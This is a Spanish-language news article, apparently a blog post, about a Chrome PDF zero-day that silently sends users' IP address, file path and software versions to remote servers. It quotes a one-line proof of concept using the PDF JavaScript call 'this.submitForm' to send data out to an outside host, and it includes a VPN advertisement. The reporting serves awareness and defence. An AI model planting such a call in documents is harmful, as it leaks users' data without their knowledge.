Servicio de detección de vulnerabilidades EdgeSpot descubrió una intrigante vulnerabilidad Chrome zero-day que explota los documentos PDF. La vulnerabilidad permite a los atacantes recopilar datos confidenciales mediante documentos PDF maliciosos abiertos en Chrome.
En cuanto la víctima abre los archivos PDF correspondientes en Google Chrome, un programa malicioso comienza a trabajar en segundo plano recopilando datos de usuario.
Los datos se reenvían al servidor remoto que está siendo controlado por los hackers. Es posible que se pregunte qué datos están siendo absorbidos por los atacantes, que se dirigen a los siguientes datos en su PC:
- Dirección IP
- Ruta completa del archivo PDF en el sistema
- Versiones OS y Chrome
Tenga cuidado con los archivos PDF malintencionados
Le sorprenderá saber que no pasa nada cuando se utiliza Adobe Reader para abrir archivos PDF. Además, las peticiones HTTP POST se utilizan para transferir datos a los servidores remotos sin intervención del usuario.
Los expertos observaron que uno de los dos dominios readnotify[.]com o burpcollaborator[.]net estaba recibiendo los datos.
Puede imaginar la intensidad del ataque considerando el hecho de que la mayoría de los programas antivirus no son capaces de detectar las muestras detectadas por EdgeSpot.
Los expertos revelan que los atacantes están utilizando la API de Javascript en PDF «this.submitForm()» para recopilar la información confidencial de los usuarios.
Lo probamos con un PoC mínimo, una simple llamada a la API como «this.submitForm(http://google.com/test)» hará que Google Chrome envíe los datos personales a google.com.
Los expertos descubrieron que este error de Chrome estaba siendo explotado por dos conjuntos distintos de archivos PDF maliciosos. Ambos fueron distribuidos en octubre de 2017 y septiembre de 2018, respectivamente.
En particular, los datos recopilados pueden ser utilizados por los atacantes para afinar los ataques en el futuro. Los informes sugieren que el primer lote de archivos se compiló utilizando el servicio de seguimiento de PDF de ReadNotify.
Los usuarios pueden utilizar el servicio para hacer un seguimiento de las vistas de los usuarios.EdgeSpot no ha compartido ningún detalle sobre la naturaleza del segundo conjunto de archivos PDF.
Cómo mantenerse protegido
En caso de que quieras estar seguro mientras navegas por Internet, necesitarás una herramienta completa para proteger tu red. < Instala ahora Cyberghost VPN y asegúrate. Protege su PC de los ataques durante la navegación, enmascara su dirección IP y bloquea todo acceso no deseado.
El servicio de detección de vulnerabilidades EdgeSpot quería alertar a los usuarios de Chrome sobre los posibles riesgos, ya que no se espera que el parche se publique en un futuro próximo.
EdgeSpot informó a Google sobre la vulnerabilidad el año pasado y la empresa prometió publicar un parche a finales de abril. H
Sin embargo, puede considerar la posibilidad de utilizar una solución temporal al problema visualizando localmente los documentos PDF recibidos mediante una aplicación de lectura de PDF alternativa.
Alternativamente, también puedes abrir tus documentos PDF en Chrome desconectando tus sistemas de Internet.Mientras tanto, puede esperar a la actualización de Chrome 74 que se espera que se ponga en marcha el 23 de abril.